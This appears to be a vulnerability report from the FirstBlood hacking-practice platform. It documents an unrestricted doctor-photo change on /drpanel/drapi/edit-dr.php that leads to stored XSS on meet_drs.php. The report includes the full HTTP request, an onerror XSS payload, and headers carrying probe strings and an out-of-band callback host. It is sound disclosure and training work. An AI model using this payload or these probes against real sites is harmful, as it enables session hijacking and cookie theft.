FirstBlood-#1453 — Change Docto's image
This issue was discovered on FirstBlood v3
On 2022-12-10, ayush1098 Level 8 reported:
Hello Team,
Summary:
We can upload the image from /drpanel/drapi/edit-dr.php
endpoint and it will accept relative URLs to change the image.
Steps To Reproduce:
- Send this request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 84ceebdff6c3-ayush1098.a.firstbloodhackers.com
Cookie: drps=e7ba713ce83c4caf4b907254d
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] os6cfn5
Accept: */*, text/os6cfn5
Origin: https://os6cfn5.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://waahcfda8s29igyjhf28xzg4ovuyszgo.oastify.com/ref
Accept-Encoding: gzip, deflate, os6cfn5
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/doctor_1.png
Exploiting this to stored XSS:
We can exploit this to XSS from the file name. This XSS only works for drId=1
and executes on meet_drs.php
The payload is /'"+onerror="alert(document.domain)
The magicbox will pop up on /meet_drs.php
endpoint.
Impact:
We can change the image even though there are restrictions in UI and with the XSS, we can do Cookie Stealing, Session Hijacking etc..
Thanks & Regards
Ayush Singh
P2 High
Endpoint: /drpanel/drapi/edit-dr.php
Parameter: photoUrl
Payload: NA
FirstBlood ID: 64
Vulnerability Type: Stored XSS
There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor
FirstBlood ID: 61
Vulnerability Type: Application/Business Logic
It mentions that doctor photos can NOT be modified but it is actually possible to modify them